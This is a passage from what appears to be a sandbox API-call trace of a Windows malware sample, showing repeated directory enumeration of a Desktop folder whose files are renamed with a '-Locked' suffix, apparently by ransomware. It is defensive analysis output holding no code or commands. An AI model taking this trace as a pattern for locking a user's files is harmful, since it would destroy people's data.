ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0302.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0302.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0302.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0302.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0302.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0302.033] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0302.033] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0302.033] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0302.034] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0302.034] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0302.034] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0302.034] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0302.035] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0302.035] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0302.035] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0302.035] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0302.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0302.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0302.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0302.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0302.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0302.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0302.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0302.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0302.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0302.038] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.038] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0302.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0302.039] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32dda7fe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32dda7fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32dda7fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0302.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32de91de, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32de91de, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32de91de, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0302.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0302.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df54d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0302.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0302.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0302.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0302.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0302.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0302.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0302.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0302.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0302.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0302.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0302.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0302.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, 